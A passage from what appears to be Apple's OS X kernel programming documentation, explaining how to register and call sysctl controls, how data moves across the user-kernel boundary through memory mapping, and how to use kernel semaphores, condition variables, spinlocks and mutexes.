    SYSCTL_PROC(_hw, OID_AUTO, l2cr, CTLTYPE_INT|CTLFLAG_RW,
        &L2CR, 0, &sysctl_l2cr, "I", "L2 Cache Register");

The _PROC part indicates that you are registering a procedure to provide the value (as opposed to simply reading from a static address in kernel memory). _hw is the top level category (in this case, hardware), and OID_AUTO indicates that you should be assigned the next available control ID in that category (as opposed to the old-style, fixed ID controls). l2cr is the name of your control, which will be used by applications to look up the number of your control using sysctlbyname.

Note: Not all top level categories will necessarily accept the addition of a user-specified new-style sysctl. If you run into problems, you should try a different top-level category.

CTLTYPE_INT indicates that the value being changed is an integer. Other legal values are CTLTYPE_NODE, CTLTYPE_STRING, CTLTYPE_QUAD, and CTLTYPE_OPAQUE (also known as CTLTYPE_STRUCT). CTLTYPE_NODE is the only one that isn’t somewhat obvious. It refers to a node in the sysctl hierarchy that isn’t directly usable, but instead is a parent to other entries. Two examples of nodes are hw and kern.

CTLFLAG_RW indicates that the value can be read and written. Other legal values are CTLFLAG_RD, CTLFLAG_WR, CTLFLAG_ANYBODY, and CTLFLAG_SECURE. CTLFLAG_ANYBODY means that the value should be modifiable by anybody. (The default is for variables to be changeable only by root.)
CTLFLAG_SECURE means that the variable can be changed only when running at securelevel <= 0 (effectively, in single-user mode).

L2CR is the location where the sysctl will store its data. Since the address is set at compile time, however, this must be a global variable or a static local variable. In this case, L2CR is a global of type unsigned int.

The number 0 is a second argument that is passed to your function. This can be used, for example, to identify which sysctl was used to call your handler function if the same handler function is used for more than one control. In the case of strings, this is used to store the maximum allowable length for incoming values.

sysctl_l2cr is the handler function for this sysctl. The prototype for these functions is of the form

    static int sysctl_l2cr SYSCTL_HANDLER_ARGS;

If the sysctl is writable, the function may either use sysctl_handle_int to obtain the value passed in from user space and store it in the default location or use the SYSCTL_IN macro to store it into an alternate buffer. This function must also use the SYSCTL_OUT macro to return a value to user space.

"I" indicates that the argument should refer to a variable of type integer (or a constant, pointer, or other piece of data of equivalent width), as opposed to "L" for a long, "A" for a string, "N" for a node (a sysctl that is the parent of a sysctl category or subcategory), or "S" for a struct. "L2 Cache Register" is a human-readable description of your sysctl.

In order for a control to be accessible from an application, it must be registered. To do this, you do the following:

    sysctl_register_oid(&sysctl__hw_l2cr);

You should generally do this in an init routine for a loadable module. If your code is not part of a loadable module, you should add your sysctl to the list of built-in OIDs in the file kern/sysctl_init.c.
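The effect of registration can be pictured with a small user-space model. This is only a sketch under stated assumptions: model_oid, model_register_oid, model_unregister_oid, and model_lookup are hypothetical names invented here, and the flat table stands in for the kernel's real OID tree, which is organized differently.

```c
#include <stddef.h>
#include <string.h>

#define MODEL_MAX_OIDS 8

/* Hypothetical, much-simplified stand-in for a sysctl OID record. */
struct model_oid {
    const char *name;   /* full dotted name, for example "hw.l2cr" */
    int        *value;  /* storage backing the control */
};

/* Flat table of registered controls; empty slots are NULL. */
static struct model_oid *model_registry[MODEL_MAX_OIDS];

/* Make a control visible to lookups. Returns 0, or -1 if the table is full. */
int model_register_oid(struct model_oid *oid)
{
    for (size_t i = 0; i < MODEL_MAX_OIDS; i++) {
        if (model_registry[i] == NULL) {
            model_registry[i] = oid;
            return 0;
        }
    }
    return -1;
}

/* Remove a control, as a module would do when it is unloaded. */
void model_unregister_oid(struct model_oid *oid)
{
    for (size_t i = 0; i < MODEL_MAX_OIDS; i++) {
        if (model_registry[i] == oid)
            model_registry[i] = NULL;
    }
}

/* Name-based lookup; only registered controls can be found. */
struct model_oid *model_lookup(const char *name)
{
    for (size_t i = 0; i < MODEL_MAX_OIDS; i++) {
        if (model_registry[i] != NULL &&
            strcmp(model_registry[i]->name, name) == 0)
            return model_registry[i];
    }
    return NULL;
}
```

The point of the model is the lifecycle: a control that has been defined but not registered cannot be found by name, and a module that registers a control should remove it again before its storage goes away.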
If you study the SYSCTL_PROC constructor macro, you will notice that sysctl__hw_l2cr is the name of a variable created by that macro. This means that the SYSCTL_PROC line must be before sysctl_register_oid in the file, and must be in the same (or broader) scope. This name is in the form of sysctl_ followed by the name of its parent node, followed by another underscore ( _ ) followed by the name of your sysctl.

A similar function, sysctl_unregister_oid, exists to remove a sysctl from the registry. If you are writing a loadable module, you should be certain to do this when your module is unloaded.

In addition to registering your handler function, you also have to write the function. The following is a typical example:

    static int myhandler SYSCTL_HANDLER_ARGS
    {
        int error, retval;

        error = sysctl_handle_int(oidp, oidp->oid_arg1, oidp->oid_arg2, req);
        if (!error && req->newptr) {
            /* We have a new value stored in the standard location. */
            /* Do with it as you see fit here. */
            printf("sysctl_test: stored %d\n", SCTEST);
        } else if (req->newptr) {
            /* Something was wrong with the write request. */
            /* Do something here if you feel like it.... */
        } else {
            /* Read request. Always return 763, just for grins. */
            printf("sysctl_test: read %d\n", SCTEST);
            retval = 763;
            error = SYSCTL_OUT(req, &retval, sizeof retval);
        }
        /* In any case, return success or return the reason for failure. */
        return error;
    }

This demonstrates the use of SYSCTL_OUT to send an arbitrary value out to user space from the sysctl handler. The “phantom” req argument is part of the function prototype when the SYSCTL_HANDLER_ARGS macro is expanded, as is the oidp variable used elsewhere. The remaining arguments are a pointer (type indifferent) and the length of data to copy (in bytes).
This code sample also introduces a new function, sysctl_handle_int, which takes the arguments passed to the sysctl, and writes the integer into the usual storage area (L2CR in the earlier example, SCTEST in this one). If you want to see the new value without storing it (to do a sanity check, for example), you should instead use the SYSCTL_IN macro, whose arguments are the same as SYSCTL_OUT.

Registering a New Top Level sysctl

In addition to adding new sysctl options, you can also add a new category or subcategory. The macro SYSCTL_DECL can be used to declare a node that can have children. This requires modifying one additional file to create the child list. For example, if your main C file does this:

    SYSCTL_DECL(_net_newcat);
    SYSCTL_NODE(_net, OID_AUTO, newcat, CTLFLAG_RW, handler, "new category");

then this is basically the same thing as declaring extern struct sysctl_oid_list sysctl__net_newcat_children in your program. In order for the kernel to compile, or the module to link, you must then add this line:

    struct sysctl_oid_list sysctl__net_newcat_children;

If you are not writing a module, this should go in the file kern/kern_newsysctl.c. Otherwise, it should go in one of the files of your module. Once you have created this variable, you can use _net_newcat as the parent when creating a new control. As with any sysctl, the node (sysctl__net_newcat) must be registered with sysctl_register_oid and can be unregistered with sysctl_unregister_oid.

Note: When creating a top level sysctl, parent is simply left blank, for example,

    SYSCTL_NODE( , OID_AUTO, _topname, flags, handler_fn, "desc");

Adding a Simple sysctl

If your sysctl only needs to read a value out of a variable, then you do not need to write a function to provide access to that variable.
Instead, you can use one of the following macros:

● SYSCTL_INT(parent, nbr, name, access, ptr, val, descr)
● SYSCTL_LONG(parent, nbr, name, access, ptr, descr)
● SYSCTL_STRING(parent, nbr, name, access, arg, len, descr)
● SYSCTL_OPAQUE(parent, nbr, name, access, ptr, len, descr)
● SYSCTL_STRUCT(parent, nbr, name, access, arg, type, descr)

The first four parameters for each macro are the same as for SYSCTL_PROC (described in the previous section) as is the last parameter. The len parameter (where applicable) gives a length of the string or opaque object in bytes.

The arg parameters are pointers just like the ptr parameters. However, the parameters named ptr are explicitly described as pointers because you must explicitly use the “address of” (&) operator unless you are already working with a pointer. Parameters called arg either operate on base types that are implicitly pointers or add the & operator in the appropriate place during macro expansion. In both cases, the argument should refer to the integer, character, or other object that the sysctl will use to store the current value.

The type parameter is the name of the type minus the “struct”. For example, if you have an object of type struct scsipi, then you would use scsipi as that argument. The SYSCTL_STRUCT macro is functionally equivalent to SYSCTL_OPAQUE, except that it hides the use of sizeof.

Finally, the val parameter for SYSCTL_INT is a default value. If the value passed in ptr is NULL, this value is returned when the sysctl is used. You can use this, for example, when adding a sysctl that is specific to certain hardware or certain compile options. One possible example of this might be a special value for feature.version that means “not present.” If that feature became available (for example, if a module were loaded by some user action), it could then update that pointer. If that module were subsequently unloaded, it could set the pointer back to NULL.
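The fallback behavior of the val parameter can be sketched in a few lines of plain C. This is a model only, under the assumption that a read simply chooses between the pointed-to value and the default; model_int_ctl and model_int_ctl_read are hypothetical names and do not correspond to anything in the kernel sources.

```c
#include <stddef.h>

/* Hypothetical model of the ptr/val pair described for SYSCTL_INT. */
struct model_int_ctl {
    int *ptr;  /* location of the live value, or NULL when absent */
    int  val;  /* value reported while ptr is NULL */
};

/* Read the control: the pointed-to value if present, else the default. */
int model_int_ctl_read(const struct model_int_ctl *ctl)
{
    return (ctl->ptr != NULL) ? *ctl->ptr : ctl->val;
}
```

In the feature.version scenario above, the control would start with ptr set to NULL and val set to the “not present” marker; loading the module would point ptr at its version variable, and unloading it would reset ptr to NULL.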
Calling a sysctl From User Space

Unlike RPC, sysctl requires explicit intervention on the part of the programmer. To complicate things further, there are two different ways of calling sysctl functions, and neither one works for every control. The old-style sysctl call can only invoke a control if it is listed in a static OID table in the kernel. The new-style sysctlbyname call will work for any user-added sysctl, but not for those listed in the static table. Occasionally, you will even find a control that is registered in both ways, and thus available to both calls. In order to understand the distinction, you must first consider the functions used.

The sysctlbyname System Call

If you are calling a sysctl that was added using the new sysctl method (including any sysctl that you may have added), then your sysctl does not have a fixed number that identifies it, since it was added dynamically to the system. Since there is no approved way to get this number from user space, and since the underlying implementation is not guaranteed to remain the same in future releases, you cannot call a dynamically added control using the sysctl function. Instead, you must use sysctlbyname.

    sysctlbyname(char *name, void *oldp, size_t *oldlenp, void *newp, u_int newlen)

The parameter name is the name of the sysctl, encoded as a standard C string.

The parameter oldp is a pointer to a buffer where the old value will be stored. The oldlenp parameter is a pointer to an integer-sized buffer that holds the current size of the oldp buffer. If the oldp buffer is not large enough to hold the returned data, the call will fail with errno set to ENOMEM, and the value pointed to by oldlenp will be changed to indicate the buffer size needed for a future call to succeed.

Here is an example for reading an integer, in this case a buffer size.
    #include <sys/types.h>
    #include <sys/sysctl.h>

    int get_debug_bufsize(void)
    {
        const char *name = "debug.bpf_bufsize";
        int bufsize, retval;
        size_t len;

        /* Tell the kernel how large the output buffer is. */
        len = sizeof(bufsize);
        retval = sysctlbyname(name, &bufsize, &len, NULL, 0);
        if (retval != 0)
            return -1;  /* errno describes the failure */
        return bufsize;
    }

The sysctl System Call

The sysctlbyname system call is the recommended way to call system controls. However, not every built-in system control is registered in the kernel in such a way that it can be called with sysctlbyname. For this reason, you should also be aware of the sysctl system call.

Note: If you are adding a sysctl, it will be accessible using sysctlbyname. You should use the sysctl system call only if the sysctl you need cannot be retrieved using sysctlbyname. In particular, you should not assume that future versions of sysctl will be backed by traditional numeric OIDs except for the existing legacy OIDs, which will be retained for compatibility reasons.

The sysctl system call is part of the original historical BSD implementation of system controls. You should not depend on its use for any control that you might add to the system. The classic usage of sysctl looks like the following:

    sysctl(int *name, u_int namelen, void *oldp, size_t *oldlenp, void *newp, u_int newlen)

System controls, in this form, are based on the MIB, or Management Information Base architecture. A MIB is a list of objects and identifiers for those objects. Each object identifier, or OID, is a list of integers that represent a tokenization of a path through the sysctl tree. For example, if the hw class of sysctl is number 3, the first integer in the OID would be the number 3. If the l2cr option is built into the system and assigned the number 75, then the second integer in the OID would be 75. To put it another way, each number in the OID is an index into a node’s list of children.
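The idea of an OID as a path through a tree can be modeled in plain C. The sketch below is an illustration only: model_node and model_resolve are hypothetical names, the child list is a simple array searched by number, and the numbers 3 and 75 are the same illustrative values used in the paragraph above rather than real assignments.

```c
#include <stddef.h>

/* Hypothetical tree node: each node has a number that identifies it
 * among its siblings, plus an optional array of children. */
struct model_node {
    int                      number;
    const char              *name;
    const struct model_node *children;
    size_t                   nchildren;
};

/* Walk the tree from root, consuming one integer of the OID per level.
 * Returns the node reached, or NULL if any step has no matching child. */
const struct model_node *model_resolve(const struct model_node *root,
                                       const int *oid, size_t oidlen)
{
    const struct model_node *cur = root;

    for (size_t i = 0; i < oidlen; i++) {
        const struct model_node *next = NULL;

        for (size_t c = 0; c < cur->nchildren; c++) {
            if (cur->children[c].number == oid[i]) {
                next = &cur->children[c];
                break;
            }
        }
        if (next == NULL)
            return NULL;    /* no child with that number at this level */
        cur = next;
    }
    return cur;
}
```

With a root whose child hw has number 3, and an l2cr child numbered 75 beneath it, the two-element OID {3, 75} resolves to the l2cr node, while any OID containing an unassigned number resolves to nothing.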
Here is a short example of a call to get the bus speed of the current computer:

    int get_bus_speed(void)
    {
        int mib[2], busspeed, retval;
        unsigned int miblen;
        size_t len;

        mib[0] = CTL_HW;
        mib[1] = HW_BUS_FREQ;
        miblen = 2;
        /* Tell the kernel how large the output buffer is. */
        len = sizeof(busspeed);
        retval = sysctl(mib, miblen, &busspeed, &len, NULL, 0);
        if (retval != 0)
            return -1;  /* errno describes the failure */
        return busspeed;
    }

For more information on the sysctl system call, see the manual page sysctl.

Memory Mapping and Block Copying

Memory mapping is one of the more common means of communicating between two applications or between an application and the kernel. While occasionally used by itself, it is usually used in conjunction with one of the other means of boundary crossing.

One way of using memory mapping is known as shared memory. In this form, one or more pages of memory are mapped into the address space of two processes. Either process can then access or modify the data stored in those shared pages. This is useful when moving large quantities of data between processes, as it allows direct communication without multiple user-kernel boundary crossings. Thus, when moving large amounts of data between processes, this is preferable to traditional message passing.

The same holds true with memory mapping between an application and the kernel. The BSD sysctl and syscall interfaces (and to an extent, Mach IPC) were designed to transfer small units of data of known size, such as an array of four integers. In this regard, they are much like a traditional C function call. If you need to pass a large amount of data to a function in C, you should pass a pointer. This is also true when passing data between an application and the kernel, with the addition of memory mapping or copying to allow that pointer to be dereferenced in the kernel.

There are a number of limitations to the way that memory mapping can be used to exchange data between an application and the kernel.
For one, memory allocated in the kernel cannot be written to by applications, including those running as root (unless the kernel is running in an insecure mode, such as single user mode). For this reason, if a buffer must be modified by an application, the buffer must be allocated by that program, not by the kernel.

When you use memory mapping for passing data to the kernel, the application allocates a block of memory and fills it with data. It then performs a system call that passes the address to the appropriate function in kernel space. It should be noted, however, that the address being passed is a virtual address, not a physical address, and more importantly, it is relative to the address space of the program, which is not the same as the address space of the kernel.

Since the address is a user-space virtual address, the kernel must call special functions to copy the block of memory into a kernel buffer or to map the block of memory into the kernel’s address space.

In the OS X kernel, data is most easily copied into kernel space with the BSD copyin function, and back out to user space with the copyout function. For large blocks of data, entire pages will be memory mapped using copy-on-write. For this reason, it is generally not useful to do memory mapping by hand.

Getting data from the kernel to an application can be done in a number of ways. The most common method is the reverse of the above, in which the application passes in a buffer pointer, the kernel scribbles on a chunk of data, uses copyout to copy the buffer data into the address space of the application, and returns KERN_SUCCESS. Note that this is really using the buffer allocated in the application, even though the physical memory may have actually been allocated by the kernel. Assuming the kernel frees its reference to the buffer, no memory is wasted.
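The copy-in, modify, copy-out pattern described above can be sketched as a user-space model. The names model_copyin, model_copyout, and model_handler are hypothetical stand-ins written for this example. In this model both "address spaces" are the same process, so a plain memcpy is enough, whereas the kernel's copyin and copyout validate the user address and can fail.

```c
#include <errno.h>
#include <stddef.h>
#include <string.h>

#define MODEL_KBUF_SIZE 64

/* Stand-in for copyin: user buffer -> private "kernel" buffer.
 * Always succeeds here; the real routine can return an error. */
int model_copyin(const void *uaddr, void *kaddr, size_t len)
{
    memcpy(kaddr, uaddr, len);
    return 0;
}

/* Stand-in for copyout: private "kernel" buffer -> user buffer. */
int model_copyout(const void *kaddr, void *uaddr, size_t len)
{
    memcpy(uaddr, kaddr, len);
    return 0;
}

/* Hypothetical handler: copy the caller's data in, uppercase it in the
 * private buffer, and copy the result back out. */
int model_handler(void *ubuf, size_t len)
{
    char kbuf[MODEL_KBUF_SIZE];
    int error;

    if (len > sizeof kbuf)
        return EINVAL;      /* never trust a caller-supplied length */

    error = model_copyin(ubuf, kbuf, len);
    if (error)
        return error;

    for (size_t i = 0; i < len; i++) {
        if (kbuf[i] >= 'a' && kbuf[i] <= 'z')
            kbuf[i] = (char)(kbuf[i] - 'a' + 'A');
    }
    return model_copyout(kbuf, ubuf, len);
}
```

The design point the model tries to show is that the handler works only on its private copy and checks the length before copying, so the caller's buffer is touched only through the two copy routines.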
A special case of memory mapping occurs when doing I/O to a device from user space. Since I/O operations can, in some cases, be performed by DMA hardware that operates based on physical addressing, it is vital that the memory associated with I/O buffers not be paged out while the hardware is copying data to or from the buffer.

For this reason, when a driver or other kernel entity needs a buffer for I/O, it must take steps to mark it as not pageable. This step is referred to as wiring the pages in memory.

Wiring pages into memory can also be helpful where high bandwidth, low latency communication is desired, as it prevents shared buffers from being paged out to disk. In general, however, this sort of workaround should be unnecessary, and is considered to be bad programming practice.

Pages can be wired in two ways. When a memory region is allocated, it may be allocated in a nonpageable fashion. The details of allocating memory for I/O differ, depending on what part of the kernel you are modifying. This is described in more detail in the appropriate sections of this document, or in the case of the I/O Kit, in the API reference documentation (available from the developer section of Apple’s web site).

Alternatively, individual pages may be wired after allocation. The recommended way to do this is through a call to vm_wire in BSD parts of the kernel, with mlock from applications (but only by processes running as root), or with IOMemoryDescriptor::prepare in the I/O Kit. Because this can fail for a number of reasons, it is particularly crucial to check return values when wiring memory.

The vm_wire call and other virtual memory topics are discussed in more detail in “Memory and Virtual Memory” (page 61). The IOMemoryDescriptor class is described in more detail in the I/O Kit API reference available from the developer section of Apple’s web site.
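For the application-side case, the following is a minimal sketch of wiring a single page with the POSIX mlock call and checking every return value, as the text above advises. The function name model_with_wired_page and its parameters are hypothetical. Whether the call succeeds depends on the privileges and resource limits of the calling process, which is why the sketch propagates errno instead of assuming success.

```c
#include <errno.h>
#include <stddef.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

/* Allocate one page, wire it, fill it with a byte value, sum it, then
 * unwire and free it. Returns 0 on success or an errno value on failure. */
int model_with_wired_page(unsigned char fill, unsigned long *sum_out)
{
    long page = sysconf(_SC_PAGESIZE);
    void *buf = NULL;
    unsigned long sum = 0;
    int error = 0;

    if (page <= 0)
        return EINVAL;
    /* Page-aligned allocation, since some systems require alignment. */
    if (posix_memalign(&buf, (size_t)page, (size_t)page) != 0)
        return ENOMEM;

    if (mlock(buf, (size_t)page) != 0) {
        error = errno;      /* wiring can fail; report why */
        free(buf);
        return error;
    }

    /* The page is resident for as long as it stays wired. */
    memset(buf, fill, (size_t)page);
    for (long i = 0; i < page; i++)
        sum += ((unsigned char *)buf)[i];
    *sum_out = sum;

    if (munlock(buf, (size_t)page) != 0)
        error = errno;
    free(buf);
    return error;
}
```

A caller would treat any nonzero result as a reason to fall back to ordinary pageable memory or to report the failure, rather than continuing as though the buffer were wired.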
Summary

Crossing the user-kernel boundary is not a trivial task. Many mechanisms exist for this communication, and each one has specific advantages and disadvantages, depending on the environment and bandwidth requirements. Security is a constant concern to prevent inadvertently allowing one program to access data or files from another program or user. It is every kernel programmer’s personal responsibility to take security into account any time that data crosses the user-kernel boundary.

Synchronization Primitives

This chapter is not intended as an introduction to synchronization. It is assumed that you have some understanding of the basic concepts of locks and semaphores already. If you need additional background reading, synchronization is covered in most introductory operating systems texts. However, since synchronization in the kernel is somewhat different from locking in an application, this chapter does provide a brief overview to help ease the transition or, for experienced kernel developers, to refresh your memory.

As an OS X kernel programmer, you have many choices of synchronization mechanisms at your disposal. The kernel itself provides two such mechanisms: locks and semaphores.

A lock is used for basic protection of shared resources. Multiple threads can attempt to acquire a lock, but only one thread can actually hold it at any given time (at least for traditional locks—more on this later). While that thread holds the lock, the other threads must wait. There are several different types of locks, differing mainly in what threads do while waiting to acquire them.

A semaphore is much like a lock, except that a finite number of threads can hold it simultaneously. Semaphores can be thought of as being much like piles of tokens. Multiple threads can take these tokens, but when there are none left, a thread must wait until another thread returns one.
It is important to note that semaphores can be implemented in many different ways, so Mach semaphores may not behave in the same way as semaphores on other platforms.

In addition to locks and semaphores, certain low-level synchronization primitives like test and set are also available, along with a number of other atomic operations. These additional operations are described in libkern/gen/OSAtomicOperations.c in the kernel sources. Such atomic operations may be helpful if you do not need something as robust as a full-fledged lock or semaphore. Since they are not general synchronization mechanisms, however, they are beyond the scope of this chapter.

Semaphores

Semaphores and locks are similar, except that with semaphores, more than one thread can be doing a given operation at once. Semaphores are commonly used when protecting multiple indistinct resources. For example, you might use a semaphore to prevent a queue from overflowing its bounds.

OS X uses traditional counting semaphores rather than binary semaphores (which are essentially locks). Mach semaphores obey Mesa semantics—that is, when a thread is awakened by a semaphore becoming available, it is not executed immediately. This presents the potential for starvation in multiprocessor situations when the system is under low overall load because other threads could keep downing the semaphore before the just-woken thread gets a chance to run. This is something that you should consider carefully when writing applications with semaphores.

Semaphores can be used any place where mutexes can occur. This precludes their use in interrupt handlers or within the context of the scheduler, and makes it strongly discouraged in the VM system.

The public API for semaphores is divided between the MIG–generated task.h file (located in your build output directory, included with #include ) and osfmk/mach/semaphore.h (included with #include ).
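The token-pile picture of a counting semaphore used in this section can be modeled in a few lines of C. This is a deliberately simplified, single-threaded sketch: model_sem and its functions are hypothetical names, the take operation reports failure instead of blocking, and nothing here is atomic, so it illustrates the counting behavior only and is not a usable synchronization primitive.

```c
#include <stdbool.h>

/* Hypothetical model: the semaphore is just a count of available tokens. */
struct model_sem {
    int tokens;
};

/* Start with a given number of tokens (the semaphore's initial value). */
void model_sem_init(struct model_sem *s, int value)
{
    s->tokens = value;
}

/* Try to take a token. A real wait operation would put the thread to
 * sleep when none are left; this model just reports false. */
bool model_sem_try_wait(struct model_sem *s)
{
    if (s->tokens == 0)
        return false;
    s->tokens--;
    return true;
}

/* Return a token to the pile, allowing another taker to proceed. */
void model_sem_signal(struct model_sem *s)
{
    s->tokens++;
}
```

Initializing the model with the number of free slots in a queue gives the overflow-protection use mentioned above: a producer takes a token before enqueuing, and a consumer returns one after dequeuing.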
The public semaphore API includes the following functions:

    kern_return_t semaphore_create(task_t task, semaphore_t *semaphore, int policy, int value)
    kern_return_t semaphore_signal(semaphore_t semaphore)
    kern_return_t semaphore_signal_all(semaphore_t semaphore)
    kern_return_t semaphore_wait(semaphore_t semaphore)
    kern_return_t semaphore_destroy(task_t task, semaphore_t semaphore)
    kern_return_t semaphore_signal_thread(semaphore_t semaphore, thread_act_t thread_act)

which are described in or xnu/osfmk/mach/semaphore.h (except for create and destroy, which are described in ).

The use of these functions is relatively straightforward with the exception of the semaphore_create, semaphore_destroy, and semaphore_signal_thread calls.

The value and semaphore parameters for semaphore_create are exactly what you would expect: a pointer to the semaphore structure to be filled out and the initial value for the semaphore, respectively.

The task parameter refers to the primary Mach task that will “own” the semaphore. This task should be the one that is ultimately responsible for the subsequent destruction of the semaphore. The task parameter used when calling semaphore_destroy must match the one used when it was created.

For communication within the kernel, the task parameter should be the result of a call to current_task. For synchronization with a user process, you need to determine the underlying Mach task for that process by calling current_task on the kernel side and mach_task_self on the application side.

    task_t current_task(void);   // returns the kernel task port
    task_t mach_task_self(void); // returns the task port of the current thread

Note: In the kernel, be sure to always use current_task. In the kernel, mach_task_self returns a pointer to the kernel’s VM map, which is probably not what you want.

The details of user-kernel synchronization are beyond the scope of this document.
The policy parameter is passed as the policy for the wait queue contained within the semaphore. The possible values are defined in osfmk/mach/sync_policy.h. Current possible values are:

● SYNC_POLICY_FIFO
● SYNC_POLICY_FIXED_PRIORITY
● SYNC_POLICY_PREPOST

The FIFO policy is, as the name suggests, first-in-first-out. The fixed priority policy causes wait queue reordering based on fixed thread priority policies. The prepost policy causes the semaphore_signal function to not increment the counter if no threads are waiting on the queue. This policy is needed for creating condition variables (where a thread is expected to always wait until signalled). See the section “Wait Queues and Wait Primitives” (page 87) for more information.

The semaphore_signal_thread call takes a particular thread from the wait queue and places it back into one of the scheduler’s wait-queues, thus making that thread available to be scheduled for execution. If thread_act is NULL, the first thread in the queue is similarly made runnable.

With the exception of semaphore_create and semaphore_destroy, these functions can also be called from user space via RPC. See “Calling RPC From User Applications” (page 116) for more information.

Condition Variables

The BSD portion of OS X provides msleep, wakeup, and wakeup_one, which are equivalent to condition variables with the addition of an optional time-out. You can find these functions in sys/proc.h in the Kernel framework headers.

The msleep call is similar to a condition variable. It puts a thread to sleep until wakeup or wakeup_one is called on that channel.
Unlike a condition variable, however, you can set a timeout measured in clock ticks. This means that it is both a synchronization call and a delay. The prototypes follow:

    msleep(void *channel, lck_mtx_t *mtx, int priority, const char *wmesg, struct timespec *timeout);
    msleep0(void *channel, lck_mtx_t *mtx, int priority, const char *wmesg, uint64_t deadline);
    wakeup(void *channel);
    wakeup_one(void *channel);

The sleep calls are similar except in the mechanism used for timeouts. The function msleep0 is not recommended for general use.

In these functions, channel is a unique identifier representing a single condition upon which you are waiting. Normally, when msleep is used, you are waiting for a change to occur in a data structure. In such cases, it is common to use the address of that data structure as the value for channel, as this ensures that no code elsewhere in the system will be using the same value.

The priority argument has three effects. First, when wakeup is called, threads are inserted in the scheduling queue at this priority. Second, if the bit (priority & PCATCH) is set, msleep0 allows signals to interrupt the sleep; if it is clear, signals do not interrupt the sleep. Third, if the bit (priority & PDROP) is zero, msleep0 drops the mutex on sleep and reacquires it upon waking. If (priority & PDROP) is set, msleep0 drops the mutex if it has to sleep, but does not reacquire it.

The wmesg argument is a short text string that represents the subsystem that is waiting on this channel. This is used solely for debugging purposes.

The timeout argument is used to set a maximum wait time. The thread may wake sooner, however, if wakeup or wakeup_one is called on the appropriate channel. It may also wake sooner if a signal is received, depending on the value of priority. In the case of msleep0, this is given as a mach abstime deadline. In the case of msleep, this is given in relative time (seconds and nanoseconds).
Outside the BSD portion of the kernel, condition variables may be implemented using semaphores.

Locks

OS X (and Mach in general) has three basic types of locks: spinlocks, mutexes, and read-write locks. Each of these has different uses and different problems. There are also many other types of locks that are not implemented in OS X, such as spin-sleep locks, some of which may be useful to implement for performance comparison purposes.

Spinlocks

A spinlock is the simplest type of lock. In a system with a test-and-set instruction or the equivalent, the code looks something like this:

    while (test_and_set(bit) != 0);

In other words, until the lock is available, it simply “spins” in a tight loop that keeps checking the lock until the thread’s time quantum expires and the next thread begins to execute. Since the entire time quantum for the first thread must complete before the next thread can execute and (possibly) release the lock, a spinlock is very wasteful of CPU time, and should be used only in places where a mutex cannot be used, such as in a hardware exception handler or low-level interrupt handler.

Note that a thread may not block while holding a spinlock, because that could cause deadlock. Further, preemption is disabled on a given processor while a spinlock is held.

There are three basic types of spinlocks available in OS X: lck_spin_t (which supersedes simple_lock_t), usimple_lock_t, and hw_lock_t. You are strongly encouraged to not use hw_lock_t; it is only mentioned for the sake of completeness. Of these, only lck_spin_t is accessible from kernel extensions.

The u in usimple stands for uniprocessor, because they are the only spinlocks that provide actual locking on uniprocessor systems. Traditional simple locks, by contrast, disable preemption but do not spin on uniprocessor systems.
Note that in most contexts, it is not useful to spin on a uniprocessor system, and thus you usually only need simple locks. Use of usimple locks is permissible for synchronization between thread context and interrupt context or between a uniprocessor and an intelligent device. However, in most cases, a mutex is a better choice.

Important: Simple and usimple locks that could potentially be shared between interrupt context and thread context must have their use coordinated with spl (see glossary). The IPL (interrupt priority level) must always be the same when acquiring the lock, otherwise deadlock may result. (This is not an issue for kernel extensions, however, as the spl functions cannot be used there.)

The spinlock functions accessible to kernel extensions consist of the following:

    extern lck_spin_t *lck_spin_alloc_init(
        lck_grp_t *grp,
        lck_attr_t *attr);

    extern void lck_spin_init(
        lck_spin_t *lck,
        lck_grp_t *grp,
        lck_attr_t *attr);

    extern void lck_spin_lock(
        lck_spin_t *lck);

    extern void lck_spin_unlock(
        lck_spin_t *lck);

    extern void lck_spin_destroy(
        lck_spin_t *lck,
        lck_grp_t *grp);

    extern void lck_spin_free(
        lck_spin_t *lck,
        lck_grp_t *grp);

    extern wait_result_t lck_spin_sleep(
        lck_spin_t *lck,
        lck_sleep_action_t lck_sleep_action,
        event_t event,
        wait_interrupt_t interruptible);

    extern wait_result_t lck_spin_sleep_deadline(
        lck_spin_t *lck,
        lck_sleep_action_t lck_sleep_action,
        event_t event,
        wait_interrupt_t interruptible,
        uint64_t deadline);

Prototypes for these locks can be found in .

The arguments to these functions are described in detail in “Using Lock Functions” (page 139).
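To make the test-and-set loop from the start of this section concrete, here is a minimal user-space sketch built on the C11 atomic_flag type. It is not the kernel's lck_spin_t implementation: the toy_spinlock_t type and the toy_spin_* functions are hypothetical names introduced for illustration, and the sketch does not disable preemption the way a kernel spinlock does.

```c
#include <stdatomic.h>
#include <stdbool.h>

/* Hypothetical user-space spinlock; not the kernel's lck_spin_t. */
typedef struct {
    atomic_flag held;
} toy_spinlock_t;

/* Static initializer: the lock starts out free. */
#define TOY_SPINLOCK_INIT { ATOMIC_FLAG_INIT }

/* One test-and-set attempt. atomic_flag_test_and_set_explicit returns the
 * previous value of the flag, so a previous value of false means the
 * caller has just acquired the lock. */
static bool toy_spin_try_lock(toy_spinlock_t *lock)
{
    return !atomic_flag_test_and_set_explicit(&lock->held,
                                              memory_order_acquire);
}

/* Spin until the lock is acquired; the caller never sleeps. */
static void toy_spin_lock(toy_spinlock_t *lock)
{
    while (!toy_spin_try_lock(lock)) {
        /* busy-wait: keep retrying the test-and-set */
    }
}

/* Release the lock so that another spinner's test-and-set can succeed. */
static void toy_spin_unlock(toy_spinlock_t *lock)
{
    atomic_flag_clear_explicit(&lock->held, memory_order_release);
}
```

The busy-wait loop is the reason the text warns against blocking while a spinlock is held: every waiter consumes CPU time for as long as the holder keeps the flag set.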
Mutexes

A mutex, mutex lock, or sleep lock, is similar to a spinlock, except that instead of constantly polling, it places itself on a queue of threads waiting for the lock, then yields the remainder of its time quantum. It does not execute again until the thread holding the lock wakes it (or in some user space variations, until an asynchronous signal arrives).

Mutexes are more efficient than spinlocks for most purposes. However, they are less efficient in multiprocessing environments where the expected lock-holding time is relatively short. If the average time is relatively short but occasionally long, spin/sleep locks may be a better choice. Although OS X does not support spin/sleep locks in the kernel, they can be easily implemented on top of existing locking primitives. If your code performance improves as a result of using such locks, however, you should probably look for ways to restructure your code, such as using more than one lock or moving to read-write locks, depending on the nature of the code in question. See “Spin/Sleep Locks” (page 138) for more information.

